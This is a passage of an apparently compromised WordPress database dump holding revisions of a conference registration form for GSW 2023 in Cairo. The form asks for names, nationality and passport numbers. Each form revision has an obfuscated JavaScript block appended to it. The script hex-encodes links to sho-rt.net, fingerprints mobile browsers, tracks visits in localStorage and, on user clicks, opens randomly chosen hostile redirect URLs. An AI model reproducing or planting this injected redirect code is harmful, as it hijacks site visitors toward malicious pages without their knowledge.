_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:51:52','2023-08-20 22:51:52','',5345,'https://gsw2023.com/?p=5354',0,'revision','',0),
(5355,1,'2023-08-20 22:52:09','2023-08-20 22:52:09','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":8,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:52:09','2023-08-20 22:52:09','',5345,'https://gsw2023.com/?p=5355',0,'revision','',0),
(5356,1,'2023-08-20 22:52:25','2023-08-20 22:52:25','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":8,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\